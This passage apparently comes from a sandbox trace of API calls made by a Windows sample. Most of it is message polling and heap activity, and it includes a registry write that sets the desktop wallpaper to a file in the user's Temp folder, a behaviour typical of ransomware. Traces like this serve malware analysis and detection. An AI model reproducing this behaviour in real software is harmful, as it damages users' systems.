lpMsg=0x8cf798) returned 0 [0237.518] Sleep (dwMilliseconds=0xa) [0237.535] timeGetTime () returned 0x117b542 [0237.535] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.535] Sleep (dwMilliseconds=0xa) [0237.549] timeGetTime () returned 0x117b552 [0237.549] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.549] Sleep (dwMilliseconds=0xa) [0237.564] timeGetTime () returned 0x117b561 [0237.564] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.564] Sleep (dwMilliseconds=0xa) [0237.583] timeGetTime () returned 0x117b571 [0237.583] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.583] Sleep (dwMilliseconds=0xa) [0237.595] timeGetTime () returned 0x117b581 [0237.596] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.596] Sleep (dwMilliseconds=0xa) [0237.615] timeGetTime () returned 0x117b590 [0237.615] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.615] Sleep (dwMilliseconds=0xa) [0237.627] timeGetTime () returned 0x117b5a0 [0237.627] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.627] Sleep (dwMilliseconds=0xa) [0237.642] timeGetTime () returned 0x117b5af [0237.643] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.643] Sleep (dwMilliseconds=0xa) [0237.659] timeGetTime () returned 0x117b5bf [0237.659] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.659] Sleep (dwMilliseconds=0xa) [0237.674] timeGetTime () returned 0x117b5cf [0237.674] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.674] Sleep (dwMilliseconds=0xa) [0237.692] timeGetTime () returned 0x117b5de [0237.692] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.692] Sleep (dwMilliseconds=0xa) [0237.705] timeGetTime () returned 0x117b5ee [0237.705] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.705] Sleep (dwMilliseconds=0xa) [0237.721] timeGetTime () returned 0x117b5fe [0237.721] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.721] Sleep (dwMilliseconds=0xa) [0237.736] timeGetTime () returned 0x117b60d [0237.736] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.736] Sleep (dwMilliseconds=0xa) [0237.752] timeGetTime () returned 0x117b61d [0237.752] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.752] Sleep (dwMilliseconds=0xa) [0237.767] timeGetTime () returned 0x117b62c [0237.768] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.768] Sleep (dwMilliseconds=0xa) [0237.784] timeGetTime () returned 0x117b63c [0237.784] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.784] Sleep (dwMilliseconds=0xa) [0237.799] timeGetTime () returned 0x117b64c [0237.799] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.799] Sleep (dwMilliseconds=0xa) [0237.814] timeGetTime () returned 0x117b65b [0237.814] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.814] Sleep (dwMilliseconds=0xa) [0237.830] timeGetTime () returned 0x117b66b [0237.830] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.830] Sleep (dwMilliseconds=0xa) [0237.846] timeGetTime () returned 0x117b67b [0237.846] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.846] Sleep (dwMilliseconds=0xa) [0237.861] timeGetTime () returned 0x117b68a [0237.861] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.861] Sleep (dwMilliseconds=0xa) [0237.879] timeGetTime () returned 0x117b69a [0237.879] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.879] Sleep (dwMilliseconds=0xa) [0237.892] timeGetTime () returned 0x117b6a9 [0237.892] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.892] Sleep (dwMilliseconds=0xa) [0237.908] timeGetTime () returned 0x117b6b9 [0237.908] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.908] Sleep (dwMilliseconds=0xa) [0237.924] timeGetTime () returned 0x117b6c9 [0237.924] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.924] Sleep (dwMilliseconds=0xa) [0237.940] timeGetTime () returned 0x117b6d8 [0237.940] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.940] Sleep (dwMilliseconds=0xa) [0237.955] timeGetTime () returned 0x117b6e8 [0237.955] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.955] Sleep (dwMilliseconds=0xa) [0237.971] timeGetTime () returned 0x117b6f8 [0237.971] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.971] Sleep (dwMilliseconds=0xa) [0237.986] timeGetTime () returned 0x117b707 [0237.986] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.986] Sleep (dwMilliseconds=0xa) [0238.002] timeGetTime () returned 0x117b717 [0238.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0238.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0238.002] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0238.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0238.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0238.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0238.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0238.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0238.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0238.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0238.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0238.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0238.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0238.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0238.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0238.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0238.003] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0238.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0238.003] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eaea0 [0238.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0238.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0238.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0238.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0238.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0238.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0238.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0238.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0238.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0238.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0238.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0238.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0238.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0238.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0238.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0238.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaea0 | out: hHeap=0x2af0000) returned 1 [0238.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0238.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0238.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0238.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0238.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0238.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0238.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0238.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0238.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0238.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0238.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0238.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0238.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0238.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73568 [0238.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0238.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0238.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0238.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0238.005] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0238.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0238.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0238.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0238.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0238.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0238.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0238.005] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0238.005] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0238.005] RegCloseKey (hKey=0x4e0) returned 0x0 [0238.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73568 | out: hHeap=0x2af0000) returned 1 [0238.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0238.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0238.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0238.006] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0238.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0238.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0238.006] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0238.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0238.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0238.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0238.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0238.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0238.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0238.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0238.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0238.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0238.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0238.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0238.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0238.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0238.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0238.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0238.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0238.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0238.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0238.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0238.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0238.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0238.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0238.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0238.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0238.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0238.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0238.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0238.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0238.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0238.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 